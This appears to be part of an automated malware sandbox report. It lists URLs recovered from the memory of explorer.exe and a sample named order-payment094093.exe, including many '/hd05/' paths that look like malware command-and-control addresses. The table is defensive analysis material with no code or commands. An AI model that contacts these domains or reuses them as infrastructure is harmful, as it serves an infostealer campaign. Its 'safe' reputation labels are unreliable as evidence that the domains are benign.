http://www.tuskerlogix.com/hd05/?nddt40n=H11Sq1KAmWy3TZ4g686+8cOrtC6/zVWn9hhmKxw0qAe7Dkpr8OJlJcVglPxuSZ3INis2/OJA+Q==&qN9=GZs8E2R84fNPO8q	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.buddhasiddhartha.com	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 0000000A.00000000.2143312911.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF	explorer.exe, 0000000A.00000003.3076686621.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3321626771.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2143312911.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false		high
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 0000000A.00000002.3326839234.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3076686621.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2146397666.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3321626771.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2143312911.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.teramilab.comReferer:	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://word.office.comM	explorer.exe, 0000000A.00000000.2151506615.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3330512018.000000000C072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979706024.000000000C06D000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.stmbbill.com/hd05/	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.damtherncooling.com/hd05/www.teramilab.com	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.damtherncooling.com/hd05/	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kathrynmirabella.com	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.symplywell.me/hd05/	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.lezxop.xyz	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-	explorer.exe, 0000000A.00000003.3076686621.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3321626771.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2143312911.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri	explorer.exe, 0000000A.00000003.3076686621.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3321626771.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2143312911.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.kathrynmirabella.comReferer:	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.symplywell.me	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tuskerlogix.com	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.lezxop.xyz/hd05/www.dropshunter.net	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.businessjp6-51399.info	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.vagabondtracks.com	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.stairs.parts/hd05/www.tuskerlogix.com	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wns.windows.com/e	explorer.exe, 0000000A.00000002.3327443671.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979100485.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3076446075.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2147208356.00000000099AB000.00000004.00000001.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	order-payment094093.exe, 00000000.00000002.2122231428.00000000031AF000.00000004.00000800.00020000.00000000.sdmp, NFOLsr.exe, 0000000B.00000002.2246034694.000000000360F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.buddhasiddhartha.com/hd05/	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.lovepox.com/hd05/www.kathrynmirabella.com	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 0000000A.00000000.2143312911.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.lezxop.xyzReferer:	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc	explorer.exe, 0000000A.00000003.3076686621.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3321626771.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2143312911.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false		high
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 0000000A.00000003.3076686621.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3321626771.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2143312911.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.businessjp6-51399.info/hd05/www.stmbbill.com	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-	explorer.exe, 0000000A.00000003.3076686621.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3321626771.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2143312911.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.damtherncooling.com	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.lovepox.comReferer:	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.stmbbill.com	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.stmbbill.com/hd05/www.lezxop.xyz	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.7727.info	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.dropshunter.net	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.dropshunter.net/hd05/	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://android.notify.windows.com/iOS	explorer.exe, 0000000A.00000002.3330304405.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2151506615.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.lovepox.com	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://outlook.come	explorer.exe, 0000000A.00000000.2151506615.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3330512018.000000000C072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979706024.000000000C06D000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp	explorer.exe, 0000000A.00000002.3327443671.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979100485.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3076446075.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2147208356.00000000099AB000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the	explorer.exe, 0000000A.00000003.3076686621.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3321626771.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2143312911.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.sparkfirestarter.net	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sparkfirestarter.net/hd05/www.damtherncooling.com	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.stmbbill.comReferer:	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-	explorer.exe, 0000000A.00000003.3076686621.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3321626771.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2143312911.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.lezxop.xyz/hd05/	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com/v1/news/Feed/Windows?	explorer.exe, 0000000A.00000000.2146397666.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3326839234.000000000962B000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.uniqueofferss.com/hd05/	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.teramilab.com	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.7727.infoReferer:	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com/I	explorer.exe, 0000000A.00000000.2146397666.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3326839234.000000000962B000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.teramilab.com/hd05/www.7727.info	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.teramilab.com/hd05/	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.damtherncooling.comReferer:	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.uniqueofferss.com	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.stairs.partsReferer:	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kathrynmirabella.com/hd05/	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.micro	explorer.exe, 0000000A.00000002.3316443586.00000000028A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000002.3325270235.0000000007B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.2144713066.0000000007B50000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.vagabondtracks.comReferer:	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.businessjp6-51399.info/hd05/	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 0000000A.00000003.3076686621.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3321626771.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2143312911.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.tuskerlogix.comReferer:	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.stairs.parts/hd05/	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.dropshunter.net/hd05/www.symplywell.me	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.buddhasiddhartha.comReferer:	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.businessjp6-51399.infoReferer:	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tuskerlogix.com/hd05/	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.buddhasiddhartha.com/hd05/www.sparkfirestarter.net	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h	explorer.exe, 0000000A.00000002.3320079951.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2143312911.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu	explorer.exe, 0000000A.00000003.3076686621.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3321626771.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2143312911.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.symplywell.me/hd05/www.buddhasiddhartha.com	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.symplywell.meReferer:	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.uniqueofferss.comReferer:	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.7727.info/hd05/	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sparkfirestarter.net/hd05/	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.uniqueofferss.com/hd05/www.lovepox.com	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
